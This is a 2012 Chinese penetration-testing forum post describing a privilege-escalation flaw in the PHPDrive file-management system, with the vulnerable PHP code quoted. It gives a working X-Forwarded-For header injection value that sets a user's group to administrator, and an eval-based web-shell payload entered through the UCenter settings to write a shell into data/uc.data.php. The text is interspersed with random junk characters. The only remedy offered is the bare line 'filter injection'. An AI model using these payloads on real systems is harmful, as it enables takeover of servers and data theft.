中国网络渗透测试联盟

标题: PHPDrive权限提升漏洞 [打印本页]
作者: admin    时间: 2012-12-31 09:18
标题: PHPDrive权限提升漏洞
PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等' A& x4 I. G% m3 |0 V8 |' k

% M; _- Z! k3 \) I" {includes/user.lib.php$ Y! r/ P7 z. y* ]7 R
行87
# U' J- z$ U- w* @, B7 ^& Y6 E3 K( q function get_ip() {4 X2 X- q% i' w5 [! u8 f" N9 S
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.% z; f1 g" o3 W" D- Z* R2 ?
在用户注册与登录 处module/disk/account.lead.php
' ^8 O6 T$ I  q/ V- K% P198行 7 A. S4 R1 `( {8 @% S
//更新本次登录IP和时间
6 O( d" r/ z! A) E             $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
% a( k- n$ X* T' p! G# g* j6 s& O由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
" i4 b, P, _' B% }* {) k* V* t% ^实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.  m( R; ]9 T2 @; ]  C. B
后台getshell:
  f0 y0 U& C0 u4 u( i! G1 N" U在UCenter设置处,将UC数据库登录名填写为
8 V' i: l0 @( _! ^( l. f ! K" ~+ u" U# _) q
root’);eval($_POST[DisKill]);?>/*8 q- ~- H5 S% c: _
可以得到一个shell,位置在 data/uc.data.php
, s1 P% \' H9 N, W+ t) o
( |, E( v& |9 q8 f) ^修复:过滤注入
7 [* y7 |1 {- H8 U8 r6 h
2 K, B7 T: b( v! e3 D" u



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2